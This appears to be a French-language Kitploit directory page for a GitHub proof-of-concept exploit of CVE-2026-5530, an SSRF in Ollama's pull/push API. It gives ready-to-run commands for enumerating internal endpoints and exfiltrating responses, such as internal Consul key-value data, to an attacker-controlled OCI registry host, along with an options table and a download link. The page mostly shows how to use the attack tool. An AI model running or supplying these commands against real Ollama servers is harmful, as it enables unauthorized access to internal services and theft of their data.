Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5530 — Preuve de concept d'exploitation pour CVE-2026-5530, une SSRF dans l'API Pull/Push d'Ollama, permettant l'énumération de points de terminaison internes et l'exfiltration complète des réponses via un registre OCI malveillant. | Kitploit
Outils/GitHubGitHub/davidrxchester/cve-2026-5530
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'Informations
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Preuve de concept d'exploitation pour CVE-2026-5530, une SSRF dans l'API Pull/Push d'Ollama, permettant l'énumération de points de terminaison internes et l'exfiltration complète des réponses via un registre OCI malveillant.

Voir le dépôt
7il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-5530

SSRF dans Ollama via redirection de registre OCI avec exfiltration complète de la réponse.

Article : https://davidrochester.com/posts/cve-2026-5530

Divulgation

Ollama a été contacté à plusieurs reprises sans réponse.

Utilisation

Trois modes : enum, exfil et probe.

Enum

Détecte les points de terminaison internes actifs accessibles depuis l'hôte Ollama.

root@kitploit:~
python3 poc.py targets.txt --registry-host <votre-ip>

Exfil

Exfiltre les réponses SSRF lorsque vous connaissez la taille de la réponse.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <votre-ip>

Probe

Recherche binaire automatique de la taille de la réponse, puis exfiltration.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <votre-ip>

Options

root@kitploit:~
target              URL ou fichier d'URL (une par ligne, # pour les commentaires)
-p, --port          port du registre malveillant (défaut : 9999)
--exfil-port        port du registre d'exfiltration (défaut : 10000)
--exfil             mode exfiltration, nécessite --size
--probe             recherche binaire de la taille, puis exfiltration
--size              Content-Length (requis avec --exfil)
--registry-host     votre IP/nom d'hôte attaquant que Ollama peut atteindre
--ollama            URL de l'API Ollama (défaut : http://127.0.0.1:11434)
Télécharger l’outil